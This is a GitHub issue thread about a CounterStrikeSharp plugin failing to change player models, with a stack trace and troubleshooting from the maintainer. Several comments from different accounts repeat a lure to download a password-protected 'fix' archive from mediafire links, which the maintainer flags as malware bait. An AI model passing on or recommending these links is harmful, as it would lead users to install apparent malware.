### ISSUE TITLE
无法更换模型QAQ

### ISSUE THREAD

**Issue by Soramagic7** [samyycX/CS2-PlayerModelChanger#29]
更换模型时后台报错并且无法更换
03:02:03 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> System.TypeInitializationException: The type initializer for 'CounterStrikeSharp.API.Modules.Memory.VirtualFunctions' threw an exception.
 ---> System.ArgumentException: Method ClientPrint not found in gamedata.json
   at CounterStrikeSharp.API.Core.GameData.GetSignature(String key) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/GameData.cs:line 94
   at CounterStrikeSharp.API.Modules.Memory.VirtualFunctions..cctor() in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Modules/Memory/VirtualFunctions.cs:line 13
   --- End of inner exception stack trace ---
   at CounterStrikeSharp.API.Core.CBaseModelEntity.SetModel(String model) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Model/CBaseModelEntity.cs:line 28
   at PlayerModelChanger.PlayerModelChanger.<>c__DisplayClass45_0.<SetModelNextServerFrame>b__0() in E:\programming\CS2-PlayerModelChanger\PlayerModelChanger.cs:line 271
   at InvokeStub_Action.Invoke(Object, Object, IntPtr*)
   at System.Reflection.MethodBaseInvoker.InvokeWithNoArgs(Object obj, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeWithNoArgs(Object obj, BindingFlags invokeAttr)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100
03:02:03 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> System.TypeInitializationException: The type initializer for 'CounterStrikeSharp.API.Modules.Memory.VirtualFunctions' threw an exception.
 ---> System.ArgumentException: Method ClientPrint not found in gamedata.json
   at CounterStrikeSharp.API.Core.GameData.GetSignature(String key) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/GameData.cs:line 94
   at CounterStrikeSharp.API.Modules.Memory.VirtualFunctions..cctor() in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Modules/Memory/VirtualFunctions.cs:line 13
   --- End of inner exception stack trace ---
   at CounterStrikeSharp.API.Core.CBaseModelEntity.SetModel(String model) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Model/CBaseModelEntity.cs:line 28
   at PlayerModelChanger.PlayerModelChanger.<>c__DisplayClass45_0.<SetModelNextServerFrame>b__0() in E:\programming\CS2-PlayerModelChanger\PlayerModelChanger.cs:line 271
   at InvokeStub_Action.Invoke(Object, Object, IntPtr*)
   at System.Reflection.MethodBaseInvoker.InvokeWithNoArgs(Object obj, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeWithNoArgs(Object obj, BindingFlags invokeAttr)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100

插件显示为LOADED，但是实际并没有生效，这个是css的问题还是该插件的问题QAQ

**Comment by samyycX** [comment]
确保你把css和metamod都更新到了最新版本

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by samyycX** [comment]
I saw a reply with malware bait link in my mailbox, although it has been deleted, please don't click it

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Soramagic7** [comment]
我还没看到呢，他就不见了ovo
不过已经解决了，重装一遍之后就好了，但是我还是找不出问题，因为我之前的meta和css也是最新的，然后在22号那次更新之后就突然坏了，好奇怪

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by samyycX** [comment]
应该是你的gamedata文件缺了
